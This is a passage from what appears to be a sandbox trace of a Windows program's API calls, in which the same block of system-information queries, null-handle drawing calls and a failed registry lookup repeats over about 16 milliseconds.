dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.472] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.472] BeginPath (hdc=0x0) returned 0 [0089.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.473] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401d9 [0089.473] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401dc [0089.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045645 [0089.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045646 [0089.473] CombineRgn (hrgnDst=0x1045645, hrgnSrc1=0x920401d9, hrgnSrc2=0x900401dc, iMode=1) returned 1 [0089.473] CombineRgn (hrgnDst=0x1045646, hrgnSrc1=0x920401d9, hrgnSrc2=0x900401dc, iMode=4) returned 2 [0089.473] CreateSolidBrush (color=0xff) returned 0x2105644 [0089.473] CreateSolidBrush (color=0xff0000) returned 0x1105647 [0089.473] DeleteObject (ho=0x1105647) returned 1 [0089.473] DeleteObject (ho=0x900401dc) returned 1 [0089.473] DeleteObject (ho=0x920401d9) returned 1 [0089.473] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.473] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.473] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.473] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.473] BeginPath (hdc=0x0) returned 0 [0089.473] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.473] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.473] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401dc [0089.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401d9 [0089.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045648 [0089.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045649 [0089.474] CombineRgn (hrgnDst=0x1045648, hrgnSrc1=0x910401dc, hrgnSrc2=0x930401d9, iMode=1) returned 1 [0089.474] CombineRgn (hrgnDst=0x1045649, hrgnSrc1=0x910401dc, hrgnSrc2=0x930401d9, iMode=4) returned 2 [0089.474] CreateSolidBrush (color=0xff) returned 0x2105647 [0089.474] CreateSolidBrush (color=0xff0000) returned 0x110564a [0089.474] DeleteObject (ho=0x110564a) returned 1 [0089.474] DeleteObject (ho=0x930401d9) returned 1 [0089.474] DeleteObject (ho=0x910401dc) returned 1 [0089.474] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.474] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.474] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.474] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.474] BeginPath (hdc=0x0) returned 0 [0089.474] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.474] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.474] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.474] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401d9 [0089.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401dc [0089.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104564b [0089.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104564c [0089.475] CombineRgn (hrgnDst=0x104564b, hrgnSrc1=0x940401d9, hrgnSrc2=0x920401dc, iMode=1) returned 1 [0089.475] CombineRgn (hrgnDst=0x104564c, hrgnSrc1=0x940401d9, hrgnSrc2=0x920401dc, iMode=4) returned 2 [0089.475] CreateSolidBrush (color=0xff) returned 0x210564a [0089.475] CreateSolidBrush (color=0xff0000) returned 0x110564d [0089.475] DeleteObject (ho=0x110564d) returned 1 [0089.475] DeleteObject (ho=0x920401dc) returned 1 [0089.475] DeleteObject (ho=0x940401d9) returned 1 [0089.475] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.475] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.475] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.475] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.475] BeginPath (hdc=0x0) returned 0 [0089.475] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.475] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.475] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.475] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.475] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401dc [0089.475] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401d9 [0089.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104564e [0089.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104564f [0089.475] CombineRgn (hrgnDst=0x104564e, hrgnSrc1=0x930401dc, hrgnSrc2=0x950401d9, iMode=1) returned 1 [0089.475] CombineRgn (hrgnDst=0x104564f, hrgnSrc1=0x930401dc, hrgnSrc2=0x950401d9, iMode=4) returned 2 [0089.475] CreateSolidBrush (color=0xff) returned 0x210564d [0089.476] CreateSolidBrush (color=0xff0000) returned 0x1105650 [0089.476] DeleteObject (ho=0x1105650) returned 1 [0089.476] DeleteObject (ho=0x950401d9) returned 1 [0089.476] DeleteObject (ho=0x930401dc) returned 1 [0089.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.476] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.476] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.476] BeginPath (hdc=0x0) returned 0 [0089.476] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.476] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.476] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.476] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.476] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401d9 [0089.476] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401dc [0089.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045651 [0089.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045652 [0089.476] CombineRgn (hrgnDst=0x1045651, hrgnSrc1=0x960401d9, hrgnSrc2=0x940401dc, iMode=1) returned 1 [0089.476] CombineRgn (hrgnDst=0x1045652, hrgnSrc1=0x960401d9, hrgnSrc2=0x940401dc, iMode=4) returned 2 [0089.476] CreateSolidBrush (color=0xff) returned 0x2105650 [0089.476] CreateSolidBrush (color=0xff0000) returned 0x1105653 [0089.476] DeleteObject (ho=0x1105653) returned 1 [0089.476] DeleteObject (ho=0x940401dc) returned 1 [0089.476] DeleteObject (ho=0x960401d9) returned 1 [0089.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.477] BeginPath (hdc=0x0) returned 0 [0089.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.477] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401dc [0089.477] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401d9 [0089.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045654 [0089.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045655 [0089.477] CombineRgn (hrgnDst=0x1045654, hrgnSrc1=0x950401dc, hrgnSrc2=0x970401d9, iMode=1) returned 1 [0089.477] CombineRgn (hrgnDst=0x1045655, hrgnSrc1=0x950401dc, hrgnSrc2=0x970401d9, iMode=4) returned 2 [0089.477] CreateSolidBrush (color=0xff) returned 0x2105653 [0089.477] CreateSolidBrush (color=0xff0000) returned 0x1105656 [0089.477] DeleteObject (ho=0x1105656) returned 1 [0089.477] DeleteObject (ho=0x970401d9) returned 1 [0089.477] DeleteObject (ho=0x950401dc) returned 1 [0089.477] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.478] BeginPath (hdc=0x0) returned 0 [0089.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.478] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401d9 [0089.478] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401dc [0089.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045657 [0089.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045658 [0089.478] CombineRgn (hrgnDst=0x1045657, hrgnSrc1=0x980401d9, hrgnSrc2=0x960401dc, iMode=1) returned 1 [0089.478] CombineRgn (hrgnDst=0x1045658, hrgnSrc1=0x980401d9, hrgnSrc2=0x960401dc, iMode=4) returned 2 [0089.478] CreateSolidBrush (color=0xff) returned 0x2105656 [0089.478] CreateSolidBrush (color=0xff0000) returned 0x1105659 [0089.486] DeleteObject (ho=0x1105659) returned 1 [0089.486] DeleteObject (ho=0x960401dc) returned 1 [0089.486] DeleteObject (ho=0x980401d9) returned 1 [0089.486] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.486] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.486] BeginPath (hdc=0x0) returned 0 [0089.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.487] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401dc [0089.487] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401d9 [0089.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104565a [0089.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104565b [0089.487] CombineRgn (hrgnDst=0x104565a, hrgnSrc1=0x970401dc, hrgnSrc2=0x990401d9, iMode=1) returned 1 [0089.487] CombineRgn (hrgnDst=0x104565b, hrgnSrc1=0x970401dc, hrgnSrc2=0x990401d9, iMode=4) returned 2 [0089.487] CreateSolidBrush (color=0xff) returned 0x2105659 [0089.487] CreateSolidBrush (color=0xff0000) returned 0x110565c [0089.487] DeleteObject (ho=0x110565c) returned 1 [0089.487] DeleteObject (ho=0x990401d9) returned 1 [0089.487] DeleteObject (ho=0x970401dc) returned 1 [0089.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.487] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.487] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.487] BeginPath (hdc=0x0) returned 0 [0089.487] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.487] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.487] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.487] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.487] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401d9 [0089.487] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401dc [0089.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104565d [0089.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104565e [0089.487] CombineRgn (hrgnDst=0x104565d, hrgnSrc1=0x9a0401d9, hrgnSrc2=0x980401dc, iMode=1) returned 1 [0089.487] CombineRgn (hrgnDst=0x104565e, hrgnSrc1=0x9a0401d9, hrgnSrc2=0x980401dc, iMode=4) returned 2 [0089.487] CreateSolidBrush (color=0xff) returned 0x210565c [0089.488] CreateSolidBrush (color=0xff0000) returned 0x110565f [0089.488] DeleteObject (ho=0x110565f) returned 1 [0089.488] DeleteObject (ho=0x980401dc) returned 1 [0089.488] DeleteObject (ho=0x9a0401d9) returned 1 [0089.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.488] BeginPath (hdc=0x0) returned 0 [0089.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.488] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 